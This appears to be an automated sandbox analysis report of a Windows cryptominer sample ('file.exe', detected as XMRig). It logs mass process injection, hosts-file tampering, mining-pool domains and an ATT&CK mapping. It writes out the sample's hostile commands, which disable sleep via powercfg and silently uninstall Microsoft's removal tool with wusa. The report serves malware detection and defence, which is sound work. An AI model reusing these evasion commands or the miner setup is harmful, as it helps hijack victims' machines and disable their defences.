Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E29D00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: 3440000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13F83A20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22360790000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24FBB770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1E7778B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 1D2DB850000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26161A70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 208B1FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E0571F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B9F4B60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D661170000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 23A75740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D730000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D760000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: PID: 2580 base: 3440000 value: 4D
Source: C:\Users\user\Desktop\file.exe | Thread register set: target process: 6716
Source: C:\ProgramData\Google\Chrome\updater.exe | Thread register set: target process: 2500
Source: C:\ProgramData\Google\Chrome\updater.exe | Thread register set: target process: 5904
Source: C:\ProgramData\Google\Chrome\updater.exe | Thread register set: target process: 7180
Source: C:\Users\user\Desktop\file.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAE2A0000
Source: C:\ProgramData\Google\Chrome\updater.exe | Memory written: C:\Windows\System32\dialer.exe base: 14000B000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B3E0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10CE0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10B30000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE109D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A661330000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B370000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 29166940000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E29D00000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: 3440000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13F83A20000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22360790000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24FBB770000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1E7778B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 1D2DB850000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26161A70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 208B1FB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E0571F0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B9F4B60000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10DF0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D661170000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 23A75740000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D730000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D760000
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\dialer.exe | Code function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 25_2_0000000140001B54
          Source: dwm.exe, 00000028.00000002.3081210081.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: winlogon.exe, 0000001E.00000000.1732994492.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001E.00000002.3073837327.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000028.00000002.3082010106.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 0000001E.00000000.1732994492.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001E.00000002.3073837327.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000028.00000002.3082010106.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: winlogon.exe, 0000001E.00000000.1732994492.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001E.00000002.3073837327.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000028.00000002.3082010106.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: winlogon.exe, 0000001E.00000000.1732994492.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001E.00000002.3073837327.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000028.00000002.3082010106.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6236F0 cpuid 30_2_00000225DC6236F0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC647960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,30_2_00000225DC647960
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exe File written: C:\Windows\System32\drivers\etc\hosts
          MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the report's count of matched signatures for that technique)

          Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances, Gather Victim Org Information, Determine Physical Locations
          Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains, DNS Server, Virtual Private Server
          Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain, Compromise Hardware Supply Chain
          Execution: Windows Management Instrumentation (11), Native API (2), Service Execution (1), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell, Unix Shell
          Persistence: DLL Side-Loading (1), Windows Service (11), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
          Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (11), Process Injection (713), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
          Defense Evasion: File and Directory Permissions Modification (1), Disable or Modify Tools (1), Obfuscated Files or Information (1), Install Root Certificate (1), DLL Side-Loading (1), File Deletion (1), Rootkit (4), Masquerading (1), Modify Registry (1), Virtualization/Sandbox Evasion (131), Access Token Manipulation (1), Process Injection (713), Hidden Files and Directories (1)
          Credential Access: Credential API Hooking (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging, GUI Input Capture
          Discovery: System Time Discovery (1), File and Directory Discovery (1), System Information Discovery (24), Security Software Discovery (331), Process Discovery (2), Virtualization/Sandbox Evasion (131), Application Window Discovery (1), Remote System Discovery (1), Network Sniffing, Network Service Discovery, System Network Connections Discovery, Process Discovery, Permission Groups Discovery
          Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media
          Collection: Archive Collected Data (1), Credential API Hooking (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture, Email Collection
          Command and Control: Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (1), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS, Proxy
          Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol, Exfiltration Over Physical Medium, Exfiltration over USB
          Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption, Resource Hijacking, Network Denial of Service

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 1549101, Sample: file.exe, Startdate: 05/11/2024, Architecture: WINDOWS, Score: 100

          Start (node 2):
            DNS/IP: monerooceans.stream, gulf.moneroocean.stream
            Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 9 other signatures
            Started: file.exe (8), updater.exe (12)
          file.exe (8):
            Dropped: C:\ProgramData\Google\Chrome\updater.exe (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII)
            Signatures: Uses powercfg.exe to modify the power settings; Modifies the context of a thread in another process (thread injection); Modifies the hosts file; Modifies power options to not sleep / hibernate
            Started: dialer.exe (14), powershell.exe (17), cmd.exe (19), 13 other processes (28)
          updater.exe (12):
            Dropped: C:\Windows\Temp\jxhirqfmeznn.sys (PE32+)
